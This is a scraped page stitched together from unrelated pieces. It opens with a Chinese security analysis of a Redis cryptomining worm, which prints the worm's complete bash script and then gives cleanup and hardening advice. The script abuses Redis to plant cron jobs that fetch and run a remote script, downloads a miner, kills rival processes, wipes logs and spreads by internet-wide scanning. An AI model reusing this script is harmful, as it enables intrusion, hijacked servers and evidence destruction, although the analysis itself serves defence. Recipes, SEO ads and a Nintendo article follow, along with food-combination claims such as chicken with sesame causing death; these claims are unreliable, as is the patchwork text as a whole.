Linux Redis自動化挖礦感染蠕蟲分析及建議

網站內容來源http://server.it168.com/

Linux Redis自動化挖礦感染蠕蟲分析及建議

2018-05-30 17:06    來源:安全客  作者: 雲鼎實驗室 Fooying 編輯:
0購買

  一、 背景

自從Redis未授權問題獲取Linux系統root權限的攻擊方法的披露后,由於其易用性,利用該問題入侵Linux服務進行挖礦、掃描等的黑客行為一直層出不窮;而在眾多利用該問題入侵服務器進行黑產行為的案例中,其中就存在一類利用該問題進行挖礦並且會利用pnscan自動掃描感染其他機器;該類攻擊一直存在,不過在近期又呈現數量增加的趨勢,在最近捕獲到多次,我們針對其做下具體的分析。

  二、 漏洞說明

首先針對利用的漏洞做個說明,Redis 默認情況下,會綁定在 0.0.0.0:6379,在沒有利用防火牆進行屏蔽的情況下,將會將Redis服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的數據。攻擊者在未授權訪問Redis的情況下利用Redis的相關方法,可以成功將自己的公鑰寫入目標服務器的 ~/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器;如果Redis服務是以root權限啟動,可以利用該問題直接獲得服務器root權限。相關漏洞詳情可以參考:

https://www.seebug.org/vuldb/ssvid-89715

以下為漏洞利用演示(上傳不了視頻,播放地址:https://v.qq.com/x/page/u0661b9o772.html):

經過在ZoomEye和SHODAN檢索,可以發現分別眾多Redis服務開放在公網上,這些服務都可能成為攻擊目標。

  三、 入侵分析

經過對捕獲的事件進行分析,我們發現整個入侵流程大概是包含以下幾個環節:1、掃描開放6379端口的Linux服務器(後續感染掃描網段為1.0.0.0/16到224.255.0.0/16)

2、通過redis-cli嘗試連接Redis並執行預置在.dat文件里的利用命令將Redis的數據文件修改為/var/spool/cron/root,然後通過在Redis中插入數據,將下載執行腳本的動作寫入crontab任務

3、通過腳本實現以上的相關行為,完成植入並啟動挖礦程序

4、再編譯安裝pnscan,繼續掃描感染下一個目標

 四、 腳本分析

整個入侵利用以及後續的感染的實現,最主要的功能都是基於通過Redis問題寫入crontab任務中下載執行的NaNd腳本(https://transfer.sh/MIpIA/tmp.9kIguIhkI7)來實現的,通過對它的分析,我們基本能夠得到整個流程的所有細節,這是一個base腳本,我們通過解讀來分析下它的相關功能。

1. sleep 1

2. find . -maxdepth 1 -name “.mxff0” -type f -mmin +60 -delete

3. [ -f .mxff0 ] && exit 0

4. echo 0 > .mxff0

這部分代碼只要是用作重複執行的判斷,將.mxff0文件作為標記文件,如果存在該文件則代表機器上已執行腳本,直接退出,否則寫.mxff0文件並進行下一步動作;

5. trap “rm -rf .m* NaNd tmp.* .r .dat $0” EXIT

設置預置動作,在腳本退出后刪除相關文件和腳本自身;

6. setenforce 0 2>/dev/null

7. echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

8. crontab -r 2>/dev/null

9. rm -rf /var/spool/cron 2>/dev/null

10. grep -q 8.8.8.8 /etc/resolv.conf || echo “nameserver 8.8.8.8” >> /etc/resolv.conf

11. rm -rf /tmp/* 2>/dev/null

12. rm -rf /var/tmp/* 2>/dev/null

13. rm -rf /etc/root.sh 2>/dev/null

14. sync && echo 3 > /proc/sys/vm/drop_caches

15. cat <<EOF> /etc/security/limits.conf

16. * hard nofile 100000

17. * soft nofile 100000

18. root hard nofile 100000

19. root soft nofile 100000

20. * hard nproc 100000

21. * soft nproc 100000

22. root hard nproc 100000

23. root soft nproc 100000

24. EOF

這部分主要是修改系統的配置,6、7行為關閉SELINU;

然後清空/var/spool/cron,進而判斷系統DNS服務器是否存在8.8.8.8,沒有則添加;

11-13則清空系統tmp目錄和刪除相關文件;

14行清空系統緩存,而15-24則是修改系統的資源限制;

25. iptables -I INPUT 1 -p tcp –dport 6379 -j DROP

26. iptables -I INPUT 1 -p tcp –dport 6379 -s 127.0.0.1 -j ACCEPT

27. ps xf | grep -v grep | grep “redis-server|nicehash|linuxs|linuxl|crawler.weibo|243/44444|cryptonight|stratum|gpg-daemon|jobs.flu.cc|nmap|cranberry|start.sh|watch.sh|krun.sh|killTop.sh|cpuminer|/60009|ssh_deny.sh|clean.sh|./over|mrx1|redisscan|ebscan|redis-cli|barad_agent|.sr0|clay|udevs|.sshd|/tmp/init” | while read pid _; do kill -9 “$pid”; done

這裏再進一步的增加iptables限制6379端口只允許本地訪問,同時kill相關包含挖礦、redis客戶端、爬蟲等進程,這裏的目的也比較簡單,避免被其他黑客再次入侵,同時清除可能其他黑客入侵啟動的進程;

28. rm -rf /tmp/* 2>/dev/null

29. rm -rf /var/tmp/* 2>/dev/null

30. echo 0 > /var/spool/mail/root

31. echo 0 > /var/log/wtmp

32. echo 0 > /var/log/secure

33. echo 0 > /root/.bash_history

清除相關登錄日誌、命令操作歷史;

34. YUM_PACKAGE_NAME=”iptables gcc redis coreutils bash curl wget”

35. DEB_PACKAGE_NAME=”coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl”

36. if cat /etc/*release | grep -i CentOS; then

37. yum clean all

38. yum install -y -q epel-release

39. yum install -y -q $YUM_PACKAGE_NAME

40. elif cat /etc/*release | grep -qi Red; then

41. yum clean all

42. yum install -y -q epel-release

43. yum install -y -q $YUM_PACKAGE_NAME

44. elif cat /etc/*release | grep -qi Fedora; then

45. yum clean all

46. yum install -y -q epel-release

47. yum install -y -q $YUM_PACKAGE_NAME

48. elif cat /etc/*release | grep -qi Ubuntu; then

49. export DEBIAN_FRONTEND=noninteractive

50. rm -rf /var/lib/apt/lists/*

51. apt-get update -q –fix-missing

52. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

53. elif cat /etc/*release | grep -qi Debian; then

54. export DEBIAN_FRONTEND=noninteractive

55. rm -rf /var/lib/apt/lists/*

56. apt-get update –fix-missing

57. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

58. elif cat /etc/*release | grep -qi Mint; then

59. export DEBIAN_FRONTEND=noninteractive

60. rm -rf /var/lib/apt/lists/*

61. apt-get update –fix-missing

62. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

63. elif cat /etc/*release | grep -qi Knoppix; then

64. export DEBIAN_FRONTEND=noninteractive

65. rm -rf /var/lib/apt/lists/*

66. apt-get update –fix-missing

67. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

68. else

69. exit 1

70. fi

71. sleep 1

72. if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then

73. curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12

74. sleep 1

75. [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112

76. fi

這一長串的內容主要目的是下載並編譯安裝pnscan,從內容中我們可以看到對於不同操作系統的判斷然後安裝依賴的相關模塊,然後才是從github下載pnscan的源碼進行編譯安裝;至於為什麼採用編譯安裝的形式,猜測是出於兼容不同系統以及每次編譯生成的pnscan的MD5都不一樣,避免形成固定特徵;

77. tname=$( mktemp )

78. OMURL=https://transfer.sh/MIpIA/tmp.vOYTgmtZge

79. curl -s $OMURL > $tname || wget -q -O $tname $OMURL

80. NMURL=$( curl -s –upload-file $tname https://transfer.sh )

81. mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg

這部分主要是下載挖礦程序並重命名為.gpg,增加執行權限,執行后刪除,同時重新上傳到https://transfer.sh/ 獲取新的鏈接;

82. [ -z “$NMURL” ] && NMURL=$OMURL

83. ncmd=$(basename $(mktemp))

84. sed ‘s|’”$OMURL”‘|’”$NMURL”‘|g’ < NaNd > $ncmd

85. NSURL=$( curl -s –upload-file $ncmd https://transfer.sh )

86. echo ‘flushall’ > .dat

87. echo ‘config set dir /var/spool/cron’ >> .dat

88. echo ‘config set dbfilename root’ >> .dat

89. echo ‘set Backup1 “tn*/2 * * * * curl -s ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

90. echo ‘set Backup2 “tn*/5 * * * * wget -O NaNd ‘${NSURL}’ && bash NaNdnt”‘ >> .dat

91. echo ‘set Backup3 “tn*/10 * * * * lynx -source ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

92. echo ‘save’ >> .dat

93. echo ‘config set dir /var/spool/cron/crontabs’ >> .dat

94. echo ‘save’ >> .dat

95. echo ‘exit’ >> .dat

而這部分內容主要是生成新的.dat文件,包含將原來NaNd腳本里的里挖礦程序的下載地址替換為上一步上傳到https://transfer.sh/ 得到的新地址,還有Redis利用的相關語句;

96. pnx=pnscan

97. [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan

98. [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan

99. for x in $( seq 1 224 | sort -R ); do

100. for y in $( seq 0 255 | sort -R ); do

101. $pnx -t512 -R ‘6f 73 3a 4c 69 6e 75 78’ -W ‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’ $x.$y.0.0/16 6379 > .r.$x.$y.o

102. awk ‘/Linux/ {print $1, $3}’ .r.$x.$y.o > .r.$x.$y.l

103. while read -r h p; do

104. cat .dat | redis-cli -h $h -p $p –raw &

105. done < .r.$x.$y.l

106. done

107. done

而步主要是調用pnscan去掃描子網段1.0.0.0/16到224.255.0.0/16中開放6379端口並且操作系統為Linux的目標,然後利用redis-cli執行.dat中的命令,進行下個目標的感染;這裏pnscan的-W參數值‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’轉換后內容‘*1rn$4rnINFOrn’,是向目標Redis服務發送請求獲取Redis服務器的各種信息和統計數值,再通過-R參數值‘6f 73 3a 4c 69 6e 75 78′(轉換后內容為os:Linux)判斷是否Linux系統。

108. echo 0 > /var/spool/mail/root 2>/dev/null

109. echo 0 > /var/log/wtmp 2>/dev/null

110. echo 0 > /var/log/secure 2>/dev/null

111. echo 0 > /root/.bash_history 2>/dev/null

112. exit 0

最後就是收尾工作,清除相關日誌和命令執行歷史,同時在腳本退出的時候會觸髮腳本一開始用trap預置的動作,會做刪除操作,刪除相關文件和腳本自身(rm -rf m* NaNd tmp.* .r .dat $0)。

通過對腳本的解讀,我們基本已經清楚整個蠕蟲的行為和入侵流程,也就是我們開始所描述的流程。

另外,通過閱讀腳本,我們發現雖然整個入侵流程並不是多複雜,但腳本其實有很多”工程化”的細節考慮,不得不讓人驚嘆入侵者的”考慮周到”:

1、 利用.mxff0文件做重複執行檢驗,避免腳本的重複執行

2、 為了增加成功性,一些環境的預處理:

a) 關閉SELINUX

b) 增加8.8.8.8的DNS

c) 清空tmp目錄

d) 清空系統緩存

e) 修改系統資源限制

3、 痕迹清除

a) 利用trap預置動作好在腳本執行完成后刪除相關文件和腳本自身

b) 重複清除相關登錄等日誌和命令執行歷史

4、 同行預防

a) 利用iptables避免Redis服務開放在公網上從而導致再次被入侵

b) 清除同行可能遺留的入侵行為,kill相關進程

5、 系統兼容性

a) 判斷操作系統,針對性的執行相關命令,安裝依賴包,最大限度的提高pnscan編譯安裝的成功率

b) 關閉SELINUX,通過setenforce和修改/etc/sysconfig/selinux兩種手段實現

c) 寫入Crontab里的下載並執行腳本的任務,通過curl、wget、lynx三種方式實現

d) Pnscan掃描增加操作系統判斷,減少沒有必要的感染嘗試

6、 特徵去除,存活延續

a) Pnscan採用安裝編譯的方式,既提高在不同系統下的兼容性,也避免形成固定的MD5特徵

b) 利用https://transfer.sh 中轉,每一次感染均生成新的連接,避免固定鏈接形成固定特徵

c) 下載到系統的相關文件均採用隨機生成的文件名

正是由於入侵者種種的”考慮周到”使得他的入侵感染的成功率能夠達到的一定的層度。

五、 安全建議

病毒清理和系統恢復

我們主要參考腳本的相關行為進行對應的行為恢復和刪除即可:

1、 關閉SELINUX,根據系統原環境和業務需要重新開啟SELINUX

2、 清空了/var/spool/cron,根據原先備份清空恢復

3、 修改/etc/resolv.conf增加DNS服務8.8.8.8,如無影響可不處理,或者刪除

4、 修改了系統資源限制(/etc/security/limits.conf),可根據備份情況恢復

5、 增加了對6379端口的Iptables規則,如果不影響業務,建議保留

6、 Kill了相關進程,檢查是否包含業務所需進程,根據情況恢復

7、 安裝了相關包,具體列表見上文,可根據情況刪除或者如無影響可保留

8、 編譯安裝了pnscan,可刪除/usr/local/bin/pnscan

9、 清除了相關日誌和tmp目錄,對系統無影響,可忽略

10、 啟動了挖礦進程和pnscan掃描感染,進程:.gpg、pnscan,直接kill

還包含了一些中間文件,雖然腳本包含相關刪除操作,但建議還是全局查找確認:.mxff0、.x112、.gpg、.dat、NaNd、.r.xx.xx.o/l、tmp.xxxx

Redis服務加固

1、 如無必要,修改bind項,不要將Redis綁定在0.0.0.0上,避免Redis服務開放在外網,可以通過iptables或者騰訊雲用戶可以通過安全組限制訪問來源

2、 在不影響業務的情況,不要以root啟動Redis服務,同時建議修改默認的6379端口,大部分針對Redis未授權問題的入侵都是針對默認端口進行的

3、 配置AUTH,增加密碼校驗,這樣即使開放在公網上,如果非弱口令的情況,黑客也無法訪問Redis服務進行相關操作

4、 使用rename-command CONFIG “RENAME_CONFIG”重命名相關命令,這樣黑客即使在連接上未授權問題的Redis服務,在不知道命令的情況下只能獲取相關數據,而無法進一步利用

  六、 附錄

IOCs

1. 腳本 https://transfer.sh/MIpIA/tmp.9kIguIhkI7

2. 挖礦程序 2918ee2b69bc4e6b581c7b25f08434fe

3. 礦池域名 http://jb.chakpools.com/

4. 相關文件名 .mxff0、.x112、.gpg、.dat、NaNd、.r.xx.xx.o/l、tmp.xxxx

  鏈接

1. 樣本 https://www.virustotal.com/#/file/9756e66c168ec963c58b3d0ca5483927c14a64a99ba718fa9488a52d4d207ed6

2. Pnscan項目地址 https://github.com/ptrrkssn/pnscan

3. 漏洞說明 https://www.seebug.org/vuldb/ssvid-89715

4. 漏洞利用演示 https://v.qq.com/x/page/u0661b9o772.html

5、雲鏡產品官網 https://cloud.tencent.com/product/hs

網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦台中網頁設計公司推薦專業設計師”嚨底家”!!

Linux Redis自動化挖礦感染蠕蟲分析及建議

油炸豆腐泡

文章導讀

油炸豆腐泡是日常飲食上十分常見的一道傳統美食,主要是用豆腐所製作而成的,經過高溫油炸之後口感變得非常好,而且其中的營養價值豐富,經常食用可以補充身體所需要的都蛋白,同時也可以起到預防疾病的作用,而且做法也很簡單,自己在家也可以輕鬆製作。

油炸豆腐泡的做法是什麼?

製作方法

家常做法

油的選擇:炸油以豆油、菜籽油、花生油為主。

制油炸坯:

做法

一斤干豆子磨8.5到9斤漿,先把第二遍漿和第三遍漿混合一起煮,千萬不要煮開,煮到85度到90度之間就停止加熱出鍋;

豆腐花

然後把第一遍生漿(生漿比較濃)與出鍋的漿液混合,沖勻後用凝固劑沖之;

蹲腦15分鐘左右上框,上滿眶大概壓下去一半,油炸豆腐坯的含水量是介於豆腐和豆腐乾之間;

油炸豆腐坯的含水量是介於豆腐和豆腐乾之間。

做法2

1、豆漿的濃度與制豆腐乾的濃度相同,濾漿后待漿溫降至80℃左右時加入涼水,降至70℃時點腦;

白豆腐

2、每100千克豆漿加入涼水10千克、蘇打100克、用滷水點之;或者豆漿中不加蘇打,每100千克豆漿加入涼水15千克,用滷水點之;

3、下滷水要慢,翻漿也要慢。腦要點嫩些,蹲腦時間稍長些;

4、點好腦後上模型壓榨,壓好后的坯子應表面亮無麻點,一斤干豆出兩斤左右的坯子。

油炸方法採用兩步法:

1、油炸豆腐泡第一階段,第一階段採用較低的油溫炸之,溫油時入鍋,坯子

內部的水分氣化膨脹,表面緩

豆腐泡

慢失水,使豆腐坯徐徐膨脹;

2、第二階段為高溫定型階段,其目的是在初膨脹的基礎上,使坯子充分膨脹,油溫一般控制在160度到180度之間,炸好后撈出。

油炸后要注意:

1、豆腐坯子含水量過低,或炸制時攪動過大,或坯子表面不光滑,或在油溫中炸制時間過長,都容易產生豆腐泡喝油現象;

2、油溫要控制好,油溫過高,則不易起泡,引起 “放泡”,很不安全。

工業做法

豆腐泡

點漿:制豆腐泡的豆漿可以稍淡,以每千克大豆制豆漿10千克為宜。為促進豆腐泡的發泡,可在熟漿中加10%的冷水。點漿時豆漿溫度宜掌握在85℃左右,凝固劑宜用27%鹽滷,用水稀釋到10%再使用,點漿方法同豆腐乾。

脹漿:時間5~10分鐘,方法同其他豆製品。

扳泔或汰泔:扳泔方法與豆腐乾扳泔相同,但一定要把板插入豆腐花缸底部,要扳兩下,扳足,使豆腐花翻得徹底。只有把豆腐花點足、扳足,才能使豆腐泡發透、發足。汰泔就是在鹽滷停止點入豆漿內,銅勺仍應繼續不停地左右攪動,使豆腐花繼續上下翻動,直到泔水大量泄出,豆腐花全面下沉為止。這個工藝俗稱“汰”。採用“汰泔”工藝製作的豆腐泡比“扳泔”法的產品發得透,發得足,但得出品略低些。

抽泔:方法與豆腐乾抽泔相同,即抽去豆腐花表層的黃漿水。

網站內容來源https://www.cndzys.com/yinshi/網站內容來源https://www.cndzys.com/yinshi/

【精選推薦文章】

想知道台東名產人氣商品是什麼?想知道更多台東知名伴手禮有哪些?

想知道全國票選五大台東必買台東伴手禮最佳商品哪裡買的到?

台東團購美食台東必買零食首選都在”購夠台東

台東人氣名產台東人氣伴手禮,熱門獨家商品,現貨供應中

油炸豆腐泡

雞肉不可以和什麼一起吃

文章導讀

雞肉總體來說是一種蛋白質含量非常高的肉製品,所以對於身體中蛋白質匱乏或者健身人士來說,可以多吃雞肉補充身體蛋白質。並且雞肉是一種自古以來就在人們餐桌上經常出現的食物,所以雞肉自然也衍生出了許多不同的做法,例如宮保雞丁土豆燒雞等。但是在吃雞肉的同時,一定要認識到什麼食物不能和雞肉一起吃。

雞肉不能和什麼一起吃

第1步雞肉+芹菜:雞肉和芹菜一起吃影響食物營養元素的吸收,破壞食物的營養結構,吃了會傷元氣。

第2步雞肉+李子:雞肉+李子一起吃會出現胃腸道反應出現腹痛腹瀉,對身體健康不利。

第3步雞肉+檸檬:雞肉不要和檸檬一起吃,因雞肉中的蛋白質和檸檬中的檸檬酸結合,會不利於人體消化和吸收。

第4步雞肉+菊花:雞肉和菊花一起吃會產生化學反應從而會引起食物中毒。

第5步雞肉+兔肉:雞肉和兔肉一起吃,一冷一熱,容易造成腹痛腹瀉的癥狀。

第6步雞肉+芝麻:雞肉和芝麻一起會產生化學反應從而引起中毒,嚴重的會導致死亡。

第7步雞肉+鮑魚:雞肉和鮑魚一起吃會破壞食物原有的營養結構從而影響消化吸收。

第8步雞肉+糯米:雞肉和糯米一起吃會引起胃腸不適,出現胃痛,胃脹等消化不良的癥狀。

第9步雞肉+狗腎:雞肉和狗腎一起吃會引起腹痛腹瀉的癥狀,對身體健康不利。

第10步雞肉+啤酒:雞肉和啤酒一起吃會形成脂肪肝,還可能引起關節炎。

第11步雞肉+蝦:雞肉和蝦一起吃會破壞食物原有的營養結構從而降低食物的營養價值。

第12步雞肉+芹菜:芹菜富含維生素C,雞肉包含較多的蛋白質,雞肉和芹菜一起吃易損傷元氣。

第13步雞肉+紅薯:雞肉含有大量蛋白質,需要肝髒的配合才可消化,而地瓜屬於難消化的食品,雞肉和紅薯一起吃有也許會造成腹痛、腹脹。

網站內容來源https://www.cndzys.com/yinshi/網站內容來源https://www.cndzys.com/yinshi/

【精選推薦文章】

評選台東伴手禮推薦商品「釋迦 」是台東必買伴手禮之一

來台東旅遊不可錯過的,台東必買名產 「池上米、地瓜酥、洛神花」都在”購夠台東“網路商城皆買的到哦!

台東吃喝懶人包!台東名產推薦台東名產伴手禮台東團購美食,都在這裡”報吼你災”

2019票選台東必買 最佳節慶送禮、年節伴手禮,釋迦禮盒小農禮盒深受國人的青睞!

雞肉不可以和什麼一起吃

雞肉怎麼過水

文章導讀

雖然雞肉的腥味並不像其他肉製品那樣濃重,但是雞肉畢竟是一種肉類食物,所以在製作雞肉之前也需要利用一些去腥手段去腥。其中給雞肉焯水,是不少家庭都會選擇的一種去腥手段,因為這種去腥手段可以達到的效果非常明顯。下面的文章將為大傢具體帶來,給雞肉焯水的相關注意事項以及小方法。

雞肉過水用涼水。

雞肉焯水(使用冷水)的步驟如下:

1、將雞肉洗凈切塊,然後倒入料酒和薑片用手抓勻,腌制半個小時,讓其充分結合,這樣也能達到去腥的效果。

2、燒一大鍋水開水焯水,倒入冷水后再放入腌制好的雞塊,最後再放入幾片薑片和蔥段,這樣可以達到更好的去腥效果。隨着溫度的上升,水面上就會慢慢浮出一些血沫和黑色浮油,將這些浮沫去除。

3、焯水時間不要太久,控制在7-8分鐘左右就好了,畢竟不是在燉雞湯,這些水面上的浮沫去除后就可把雞塊全部撈出,然後再用冷水沖洗幾遍,這樣可以使雞肉更加緊緻,更加嫩滑。這樣處理過後的雞肉不會有一點生腥味,肉質還會更加嫩滑,接着再用來烹調不但能夠縮短烹飪時間,還能使雞肉的味道更加鮮美。

雞肉怎麼做才嫩

1、上漿的三步

上漿的三步完成了,雞肉就能成功鎖住水分,做出來的雞肉就會變得非常嫩滑。雞肉上漿的原理:

(1)揉入少許水,讓雞肉吸收飽滿的水分。

做法:切好的雞肉,加入適量水,用手不停摔打,讓水分進入到雞肉中,摔打至有粘性即可。

(2)加入蛋清,將吸收了水分的雞肉裹起來,雞肉再焯水或過油的時候,水分就會析出。

做法:加入一個蛋清,使水分裹在雞肉裏面,再用手不停攪拌,讓蛋清裹住雞肉。

(3)裹上澱粉,會使雞肉的口感更加滑嫩,水份更加牢固地鎖住在雞肉裏面。

做法:上一步攪拌感覺雞肉沾手、有光澤了,再加1勺澱粉,然後抓幾下,腌製片刻。

2、食醋水浸泡

雞肉用猛火燉煮,肉質較硬不可口,建議還可先用涼水加少量食醋泡上2個小時左右,再進行烹煮,肉質就會變得比較鮮嫩。

3、加啤酒

雞肉燉煮或燒制的時候,加點啤酒比較好,啤酒不但可以讓雞肉更加鮮嫩,而且味道純正,鮮嫩可口,還可去腥。

4、鹽不宜早放

煮雞肉宜用砂鍋煮。將整隻雞放進砂鍋裏面,倒上水,放根蔥,放上蒜,記住這時一定不能放鹽,放鹽越煮越老。燉上幾個小時,味道特別香,然後再根據自己口味在放點鹽。鹽不宜早放,一般出鍋前10分鐘左右放比較合適。

5、冷凍

如果是從市場剛買來的活雞,應先放冰箱冷凍室冰凍3~4個小時再取出解凍燉煮。這和排酸肉的原理是相同的,動物驟然被殺,體內會自然釋放多種毒素,而且剛宰殺的熱肉細菌繁殖迅速。冷凍既殺菌,也讓肉從“僵直期”過渡“腐敗期”到 “成熟期”,這時的肉質最好,再來燉湯做菜明顯香嫩。

6、用燉湯法

一般我們煮雞肉都是直接加熱的,如果想吃到更加嫩滑的雞肉,建議採用隔水加熱的燉湯法。“隔水”的燉湯品質最高。通過燉盅外的水的高溫和蒸氣,間接使燉盅內的溫度升至沸點,原料的精華全部逼入湯中。燉湯湯色清澈,更為原汁原味。

另外,食材雖燉至熟爛,但形狀也能保持完整。燉出來的肉質也比較軟嫩。而直接加熱煮的雞肉,易讓湯汁的顏色較混濁,食材也因久煮,形狀多半爛掉,且味道都滲入湯汁里,口感既澀又無味。

做法:把原材料與清水放在砂鍋(或燉盅)里,蓋上鍋蓋,置於一大鍋內(鍋內的水量低於砂鍋,以水沸時不溢進砂鍋為宜)。

網站內容來源https://www.cndzys.com/yinshi/網站內容來源https://www.cndzys.com/yinshi/

【精選推薦文章】

一生必吃一次芒果界的LV,皆在購夠台東網路商城!

台東名產,台東美食吃透透,網購票選人氣NO.1商品,快速滿足您的味蕾!

當地限定的台東伴手禮,讓您買到剁手!內行人推這8樣台東必買零食!

雞肉怎麼過水

任天堂聯姻騰訊,會是一樁皆大歡喜的婚事嗎?

這一步是很有意義的,也是一件好事,畢竟,一個更開放、更多元、競爭激烈的遊戲環境,才能誕生更多優秀的公司和值得掏空錢包的作品。

文/駱北

來源:刺蝟公社(ID:ciweigongshe)

經過那麼多次“狼來了”,這一次,任天堂可能真的要進入中國了。

4 月 18 日,廣東省文化和旅遊廳發布《2019 年第一季度廣東省遊戲遊藝設備內容審核通過機型機種目錄》的公示,公示名單显示,騰訊科技(深圳)有限公司申報了一款名為“Nintendo Switch 遊戲機《新超級馬力歐兄弟 U 豪華版(體驗版)》”的產品,並通過了審核。

圖片來源:廣東省文旅廳官網

  有媒體稱,此次過審的並非 NS 主機,而是《新超級馬力歐兄弟U豪華版》這款主機遊戲,但文件中明確該公示的依據是《文化部關於允許內外資企業從事遊戲遊藝設備生產和銷售的通知》,名單上的其他產品也都是遊戲硬件設備,只是均為內容單一的遊藝機,如跳舞機、投籃機,而 NS 則備註為手持類电子遊戲機。

根據以往任天堂將 NS 與遊戲新作捆綁銷售的做法,或可推測這款產品是內置了《新超級馬力歐兄弟U豪華版》這款遊戲的定製版 Switch,但截至發稿,騰訊遊戲方面並未公開回應此事。

Switch 是任天堂的明星產品,也是前任社長岩田聰主導的最後一款遊戲機,憑藉主機和掌機任意切換的一體化設計,以及《塞爾達傳說:荒野之息》等製作精良的任天堂第一方獨佔遊戲,2017 年,Switch 力壓 iPhone X,當選《時代》評選的 2017 年十大數碼產品之首。

可惜,自發售以來,中國大陸的玩家只能通過海外購買渠道,買到日版、美版或港版行貨,Switch 拿到手后,想要在任天堂線上商店 eShop 上買遊戲更是麻煩,很多人都只能通過淘寶買實體卡的方式購買遊戲,價格比線上商店貴了一大截。

任天堂不再佛系

在索尼、微軟、任天堂這三家主機遊戲服務商中,任天堂應該是最佛系的那一個,對中國大陸市場一直若即若離。

在 2014 年遊戲機禁令解除之後,索尼和微軟很快就在國內成立了合資公司,索尼互動娛樂(上海)有限公司和上海百家合信息技術發展有限公司,負責各自最新世代家用主機的銷售。

實際上,任天堂是御三家中最早成立合資公司併發售遊戲機的。2002 年,任天堂入股國內公司神遊科技,並在 2003 年發售了國內第一款遊戲機“神遊機”,是任天堂 N64 的本地版,比索尼 PS2 國行發布還要早一些。

神遊機(圖片來源:神遊科技官網)

  但不管是索尼還是任天堂,在中國市場都舉步維艱,政策上,遊戲機禁令是一頭攔路猛虎,不管是宣發還是銷售,都只能低調行事;市場方面,主機領域,水貨橫行,盜版泛濫,免費的 PC 遊戲佔據了絕大部分市場,電腦單機和主機遊戲都只在夾縫中艱難求生,最終,任天堂和索尼都在中國市場慘敗而歸。

嘗試進入中國失敗后,很長時間內,國外遊戲廠商對中國市場都持有非常謹慎的觀望態度,不會輕易進入中國,遊戲機都執行嚴格的鎖區政策,大量國外廠商開發的主機遊戲都沒有簡體中文語言,中國的主機玩家群體進一步縮減。

長達 14 年的空白,讓中國主機遊戲市場的發育遠遠落後於日本及歐美,雖然遊戲機禁令已經解除了四年,但情況依舊沒有多少好轉,《2018 年中國遊戲產業報告》显示,中國主機遊戲市場銷售額僅占國內遊戲市場的 0.5%。

幾乎每逢任天堂的財報發布會,外界都會詢問任天堂是否有進入中國大陸並開始銷售 Switch 的計劃,在 2018 年 4 月的簡報會上,任天堂總裁谷川俊太郎還表示,雖然很想進入中國市場,但因為“各種各樣的問題”,此事有很大的難度,一方面是政策法規,一方面是中國主機市場很小。

但同時,谷川也表示,任天堂一直在關注和研究中國市場,希望儘快讓中國玩家體驗到任天堂帶來的遊戲樂趣,而且正在和外部公司就相關問題進行協商。

顯然,作為未來任天堂娛樂事業藍圖的中心,Switch 不能眼睜睜看着逐步發展壯大的中國市場完全被索尼和微軟佔據,進入中國的步伐必須加快了。

2019 年 1 月 29 日,Switch 在最新的系統更新中加入對“簡體中文”的支持,現在回過頭看,這也許是 Switch 正式進入中國的前兆,與此同時,任天堂獨佔的第一方遊戲大作幾乎都實現了自帶漢化,大大刺激了 Switch 和任天堂遊戲在國內的銷量。

直到現在,一錘定音,這一次,國行 Switch 恐怕真的要來了。

關了一扇門,開了一扇窗

企查查數據显示,4 月 16 日,騰訊科技(深圳)有限公司經營範圍發生變更,新增遊戲遊藝設備銷售業務,緊接着,爆出騰訊將代理 Switch 的消息。

為什麼是騰訊?

早在 2017 年 10 月,就有媒體稱騰訊將和任天堂聯手,在國內發行 2017 年上半年推出的最新主機 Switch,發售時間為 2018 年,甚至具體到,在和阿里的競爭中,騰訊以保底 200 萬台銷量的協議拿下了 Switch 的國內代理權。

但很快,騰訊遊戲官方就否認了這一消息,原本抱着政治正確黑騰訊的廣大玩家甚至有點感到惋惜。

神奇的是,國內的主機和單機玩家對於騰訊一直懷着又敬又怕的態度,想讓騰訊承擔起國內遊戲第一大廠的責任,讓國內遊戲環境產生一點改變,但又怕這些產品被騰訊代理之後,失掉了原本的味道,變成又一種騙氪的工具。

每當國外市場上有一款口碑佳作或全新硬件設備,而它們又礙於國內政策法規無法順利進入國內市場,玩家又對糟糕的聯機體驗或鎖區鎖服難以忍受的時候,騰訊就會被拎出來,當起玩家心中的“救世主”。

但大部分時候,這些期望都會落空,國外廠商和騰訊之間,多是落花有意,流水無情,部分情況下,騰訊會自己先干起來,學習國外公司的一些先進經驗,在國內搞個類似的出來,填補市場空白,Wegame 就是一個絕好的例子。

Wegame 標語(圖片來源:Wegame 官網)

  騰訊對於 Wegame 的野心是顯而易見的,上線之初,對其寄予厚望,騰訊花費大投入,用來引進 3A 大作和持續上架中小型遊戲,也做出了一些成果,不乏《飢荒》《星露穀物語》這樣的精品遊戲。

